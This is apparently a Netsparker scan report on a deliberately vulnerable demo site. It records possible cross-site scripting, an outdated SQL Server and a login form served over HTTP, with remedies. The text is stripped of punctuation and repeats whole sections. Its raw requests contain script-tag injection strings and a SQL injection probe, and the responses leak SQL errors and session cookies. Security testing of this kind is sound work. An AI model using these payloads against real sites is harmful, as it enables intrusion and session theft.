Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
ResponseHTTP11 302 FoundCache-Control privateDate Mon 25 Aug 2014 225900 GMTLocation httphackyourselffirsttroyhuntcomServer Microsoft-IIS80Set-CookieAuthCookie=83F87081CDBC4CAC96FBBA3C773F139F952893E2A76E1B1AD3A6E8C32B935F9A14A7467ADD80BBC637E096BB698E00D1E437A060334677EA4A758738F5F619C1C59687F889818B80FF72D699D7B9FEA6F2F89F33E2A38DABBD39EEE2F5538787A104A63D8131741D813003A6B1E980EF52692C81A2395EB8B18B21613B890AF7 expires=Tue 25-Aug-2015 225900 GMT path=Password=Mw== expires=Tue 25-Aug-2015 225900 GMT path=Email=netsparkerexamplecom expires=Tue 25-Aug-2015 225900 GMT path=
X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 155Content-Type texthtml charset=utf-8
lthtmlgtltheadgtlttitlegtObject movedlttitlegtltheadgtltbodygtlth2gtObject moved to lta href=httphackyourselffirsttroyhuntcomgthereltagtlth2gtltbodygtlthtmlgt
22 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
ResponseHTTP11 200 OKCache-Control privateDate Mon 25 Aug 2014 225838 GMTVary Accept-EncodingServer Microsoft-IIS80X-XSS-Protection 0X-AspNetMvc-Version 51X-AspNet-Version 4030319X-Powered-By ASPNETContent-Encoding Content-Length 2549Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtml lang=engtltheadgtltmeta charset=utf-8 gtlttitlegtLog in - Supercar Showdownlttitlegtltlink href=faviconico rel=shortcut icon type=imagex-icon gtltmeta name=viewport content=width=device-width gtltlink href=Contentsitev=94ys6lTNFlsmnNPD5EyUiGtWGzSZmuEQGdWkL_-WEEI1 rel=stylesheetgt
ltheadgtltbodygtltheader class=navbar-wrappergtltdiv class=containergtltdiv class=navbar navbar-inversegtltdiv class=navbar-innergtltbutton type=button class=btn btn-navbar data-toggle=collapse data-target=nav-collapsegtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltspan class=icon-bargtltspangtltbuttongtlta class=brand href=httphackyourselffirsttroyhuntcomgtSupercar Showdownltagtltdiv class=nav-collapse collapsegtltul class=navgtltligtlta href=httphackyourselffirsttroyhuntcomSupercarLeaderboardgtLeaderboardltagtltligtltli class=dropdowngtlta href= class=dropdown-toggle data-toggle=dropdowngtMy account ltb class=caretgtltbgtltagtltul class=dropdown-menugtltform action=httphackyourselffirsttroyhuntcomAccountLogOff id=logoutForm method=post class=navbar-formgtltformgtltligtlta href=httpshackyourselffirsttroyhuntcomAccountChangePasswordgtChange passwordltagtltligtltligtlta href=httphackyourselffirsttroyhuntcomAccountUserProfilegtEdit profileltagtltligtlthellip
26 57
3 TOTALMEDIUM
9 [Possible] Cross-site ScriptingNetsparkerdetectedpossiblecross-sitescriptingwhichallowsanattackertoexecuteadynamicscript(JavaScriptVBScript)inthecontextoftheapplication
ThisallowsseveraldifferentattackopportunitiesmostlyhijackingthecurrentsessionoftheuserorchangingthelookofthepagebychangingtheHTMLontheflytostealtheuserscredentialsThishappensbecausetheinputenteredbyauserhasbeeninterpretedasHTMLJavaScriptVBScriptbythebrowserCross-sitescriptingtargetstheusersoftheapplicationinsteadoftheserverAlthoughthisisalimitationsinceitallowsattackerstohijackotheruserssessionsanattackermightattackanadministratortogainfullcontrolovertheapplication
AlthoughNetsparkerbelievesthereisacross-sitescriptinginhereitcould not confirm itWestronglyrecommendinvestigatingtheissuemanuallytoensureitiscross-sitescriptingandneedstobeaddressed
ImpactTherearemanydifferentattacksthatcanbeleveragedthroughtheuseofXSSincluding
HijackingusersactivesessionChangingthelookofthepagewithinthevictimsbrowserMountingasuccessfulphishingattackInterceptingdataandperformingman-in-the-middleattacks
RemedyThisissueoccursbecausethebrowserinterpretstheinputasactiveHTMLJavaScriptorVBScriptToavoidthisallinputandoutputfromtheapplicationshouldbefilteredencodedOutputshouldbefilteredencodedaccordingtotheoutputformatandlocation
Thereareanumberofpre-definedwellstructuredwhitelistlibrariesavailableformanydifferentenvironmentsGoodexamplesoftheseincludeOWASPReformandMicrosoftAnticross-sitescriptinglibraries
Remedy References[ASPNET]-MicrosoftAnti-XSSLibraryOWASPXSSPreventionCheatSheet
External ReferencesXSSCheatSheetOWASP-cross-sitescriptingXSSShellXSSTunnelling
ClassificationOWASP2010-A2OWASP2013-A3PCIV20-657PCIV30-657CWE-79CAPEC-19WASC-08
91 apivotehttphackyourselffirsttroyhuntcomapivote
ParametersParameter Type Value
userId POST 1
supercarId POST 3
comments POST --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
27 57
RequestPOST apivote HTTP11Cache-Control no-cacheUser-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept Origin httphackyourselffirsttroyhuntcomReferer httphackyourselffirsttroyhuntcomSupercar3X-Requested-With XMLHttpRequestAccept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflateContent-Length 90Content-Type applicationx-www-form-urlencoded charset=UTF-8
userId=1ampsupercarId=3ampcomments=--gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt
ResponseHTTP11 500 Internal Server ErrorCache-Control no-cacheDate Mon 25 Aug 2014 232047 GMTPragma no-cacheServer Microsoft-IIS80X-XSS-Protection 0X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 2985Content-Type applicationjson charset=utf-8Expires -1
MessageAn error has occurredExceptionMessageUnclosed quotation mark after the character string --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)rnIncorrect syntax near --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x000437)ltscRiptgt)ExceptionTypeSystemDataSqlClientSqlExceptionStackTrace atSystemDataSqlClientSqlConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientSqlInternalConnectionOnError(SqlException exception Boolean breakConnection Action`1 wrapCloseInAction)rn atSystemDataSqlClientTdsParserThrowExceptionAndWarning(TdsParserStateObject stateObj Boolean callerHasConnectionLock Boolean asyncClose)rn atSystemDataSqlClientTdsParserTryRun(RunBehavior runBehavior SqlCommand cmdHandler SqlDataReader dataStream BulkCopySimpleResultSet bulkCopyHandlerTdsParserStateObject stateObj Booleanamp dataReady)rn at SystemDataSqlClientSqlCommandRunExecuteNonQueryTds(String methodName Boolean async Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandInternalExecuteNonQuery(TaskCompletionSource`1 completion String methodName Boolean sendToPipe Int32 timeout BooleanasyncWrite)rn at SystemDataSqlClientSqlCommandExecuteNonQuery()rn at WebControllersVoteControllerPost(Vote vote)rn at lambda_method(Closure Object Object[])rn at SystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorltgtc__DisplayClass10ltGetExecutorgtb__9(Object instance Object[] methodParameters)rn atSystemWebHttpControllersReflectedHttpActionDescriptorActionExecutorExecute(Object instanchellip
92 apiadminhttphackyourselffirsttroyhuntcomapiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt
ParametersParameter Type Value
nsextt GET --gtltstylegtltscRiptgtltscRiptgtnetsparker(0x0002E0)ltscRiptgt
NotesDue to the Content-type header of the response exploitation of this vulnerability might not be possible in all browsers or mightnot be possible at all The Content-type header indicates that there is a possibility of exploitation by changing the attackHowever Netsparker does not support confirming these issues You need to manually confirm this problem Generally lack of filteringin the response can cause Cross-site Scripting vulnerabilities in browsers with auto mime sniffing such as Internet Explorer
Certainty
RequestGET apiadminnsextt=22--3E3Cstyle3E3CscRipt3E3CscRipt3Enetsparker(0x0002E0)3CscRipt3E HTTP11Cache-Control no-cacheAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
28 57
1 TOTALIMPORTANT
7 Out-of-date Version (Microsoft SQL Server)Netsparkeridentifiedyouareusinganout-of-dateversionofMicrosoftSQL
ImpactSincethisisanoldversionofthesoftwareitmaybevulnerabletoattacks
RemedyPleaseupgradeyourinstallationofMicrosoftSQLServertothelateststableversion
ClassificationOWASP2010-A6OWASP2013-A9PCIV20-61PCIV30-61CAPEC-310
71 Make1httphackyourselffirsttroyhuntcomMake1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHA
Identified Version110922217
Latest Version12002000
Vulnerability DatabaseResult is based on 18082014 vulnerability database content
Certainty
RequestGET Make1orderby=(select+convert(int2cCHAR(95)2bCHAR(33)2bCHAR(64)2bCHAR(50)2bCHAR(100)2bCHAR(105)2bCHAR(108)2bCHAR(101)2bCHAR(109)2bCHAR(109)2bCHAR(97))+FROM+syscolumns) HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=70C1996BFE542E03455FD23A7DF6BAFC4683ACDAB380D9E50281255EC813210887335C804EE36FD13E32AAE41FB0A940B85A5E23846F83F5CC500E6F0D9E1353EFFD9B6AB3040E3CFADA99D3AD65DC3633FD92922B61E8A18F9DD0EF1C993A17FC47536EBB3714036FB3E3DBCD43CB7CF0621AE2D60D3A13BEFA9CDA66241A7D Password=Mw== Email=netsparkerexamplecomARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
23 57
ResponseHTTP11 500 Internal Server ErrorCache-Control privateDate Mon 25 Aug 2014 225955 GMTServer Microsoft-IIS80X-AspNet-Version 4030319X-Powered-By ASPNETContent-Length 14154Content-Type texthtml charset=utf-8
ltDOCTYPE htmlgtlthtmlgtltheadgtlttitlegtConversion failed when converting the varchar value _2dilemma to data type intlttitlegtltmeta name=viewport content=width=device-width gtltstylegtbody font-familyVerdanafont-weightnormalfont-size 7emcolorblack p font-familyVerdanafont-weightnormalcolorblackmargin-top -5pxb font-familyVerdanafont-weightboldcolorblackmargin-top -5pxH1 font-familyVerdanafont-weightnormalfont-size18ptcolorred H2 font-familyVerdanafont-weightnormalfont-size14ptcolormaroon pre font-familyConsolasLucida ConsoleMonospacefont-size11ptmargin0padding05emline-height14ptmarker font-weight bold color blacktext-decoration noneversion color grayerror margin-bottom 10pxexpandable text-decorationunderline font-weightbold colornavy cursorhand media screen and (max-width 639px) pre width 440px overflow auto white-space pre-wrap word-wrap break-word media screen and (max-width 479px) pre width 280px ltstylegtltheadgt
ltbody bgcolor=whitegt
ltspangtltH1gtServer Error in Applicationlthr width=100 size=1 color=silvergtltH1gt
lth2gt ltigtConversion failed when converting the varchar value _2dilemma to data type intltigt lth2gtltspangt
ltfont face=Arial Helvetica Geneva SunSans-Regular sans-serif gt
ltbgt Description ltbgtAn unhandled exception occurred during the execution of the current web request Please reviehellip
24 57
1 TOTALMEDIUM
CONFIRMED
1
8 Critical Form Served over HTTPNetsparkerdetectedthatacriticalformisservedoverHTTP
ImpactIfanattackercancarryoutaman-in-the-middleattackheshemaybeabletointercepttrafficbyinjectingJavaScriptcodeintothispageorchangingactionoftheHTTPcodetostealtheuserspasswordEventhoughthetargetpageisHTTPSthisdoesnotprotectthesystemagainstman-in-the-middleattacks
ThisissueisimportantasitnegatestheuseofSSLasaprivacyprotectionbarrier
Actions to Take1 Seetheremedyforsolution2 MoveallofyourcriticalformstoHTTPSanddonotallowthesepagestobeservedoverHTTP
RemedyAllsensitivedatashouldbetransferredoverHTTPSratherthanHTTPFormsshouldbeservedoverHTTPSAllaspectsoftheapplicationthatacceptuserinputstartingfromtheloginprocessshouldonlybeservedoverHTTPS
ClassificationOWASP2010-A9OWASP2013-A6PCIV20-654PCIV30-654CWE-319CAPEC-65WASC-04
81 AccountLogin CONFIRMEDhttphackyourselffirsttroyhuntcomAccountLogin
Form target actionhttpshackyourselffirsttroyhuntcomAccountLogin
RequestGET AccountLogin HTTP11Cache-Control no-cacheReferer httphackyourselffirsttroyhuntcomAccept textxmlapplicationxmlapplicationxhtml+xmltexthtmlq=09textplainq=08imagepngq=05User-Agent Mozilla50 (Windows NT 63 WOW64) AppleWebKit53736 (KHTML like Gecko) Chrome3301750170 Safari53736Accept-Language en-usenq=05X-Scanner NetsparkerHost hackyourselffirsttroyhuntcomCookie ASPNET_SessionId=eykomas2qwtytb2b4i3u3rvj VisitStart=8252014 105752 PMAuthCookie=57007E5718C949BB9DC8E5A74B45AFB8C217ACFD8FD98F8023C637FF8D1BABD440D2F2AD0AF35F86E8F32E6C454628305E619D8676ED718595618D220E725F2F5813F5A4B4604461ADB93EF796E499FE922687BE7848361F0CDEE483E11F997A92B2760021E9744C920EF124EEE2381E87A6A46642104F351292394B396FA228 ARRAffinity=676a03b62014623bb78415d33912c3b249f249141dd561816e83926ee7df9d29Accept-Encoding gzip deflate
25 57
